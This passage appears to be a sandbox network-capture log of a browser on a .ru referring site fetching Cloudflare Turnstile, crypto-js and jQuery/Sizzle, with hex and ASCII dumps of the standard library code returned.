                                              2024-12-18 22:41:46 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                              2024-12-18 22:41:46 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                              2024-12-18 22:41:46 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                              2024-12-18 22:41:46 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449757104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:45 UTC647OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://to.eemjhiulz.ru/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:46 UTC386INHTTP/1.1 302 Found
                                              Date: Wed, 18 Dec 2024 22:41:46 GMT
                                              Content-Length: 0
                                              Connection: close
                                              access-control-allow-origin: *
                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                              cross-origin-resource-policy: cross-origin
                                              location: /turnstile/v0/b/787bc399e22f/api.js
                                              Server: cloudflare
                                              CF-RAY: 8f42a988295e43b8-EWR
                                              alt-svc: h3=":443"; ma=86400


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449758104.17.24.144434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:45 UTC649OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://to.eemjhiulz.ru/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:46 UTC963INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:46 GMT
                                              Content-Type: application/javascript; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: W/"61182885-40eb"
                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 17561
                                              Expires: Mon, 08 Dec 2025 22:41:46 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbdZguWOcQHkr6I0T669yQE6em2oXzMFI5Jv%2BC8utAWa%2B%2FPOOLaxeIF68xv5EmHOJKV8SHibNeWC85R2rQAmamXJi0g%2B3vWE9NtsrU%2Bhg8o4%2FQM1MZIQBTMQw4LYU8WbetxWlbuD"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8f42a9882f1f41de-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:46 UTC406INData Raw: 37 62 65 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                              Data Ascii: 7bee!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                              2024-12-18 22:41:46 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                              Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                              2024-12-18 22:41:46 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                              Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
                                              2024-12-18 22:41:46 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                              Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
                                              2024-12-18 22:41:46 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33
                                              Data Ascii: for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3
                                              2024-12-18 22:41:46 UTC1369INData Raw: 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36
                                              Data Ascii: 1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16
                                              2024-12-18 22:41:46 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                              Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                              2024-12-18 22:41:46 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                              Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                              2024-12-18 22:41:46 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                              Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                              2024-12-18 22:41:46 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                              Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449760104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:47 UTC646OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://to.eemjhiulz.ru/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:48 UTC471INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:47 GMT
                                              Content-Type: application/javascript; charset=UTF-8
                                              Content-Length: 47692
                                              Connection: close
                                              accept-ranges: bytes
                                              last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                              access-control-allow-origin: *
                                              cross-origin-resource-policy: cross-origin
                                              Server: cloudflare
                                              CF-RAY: 8f42a992bd8742d5-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:48 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
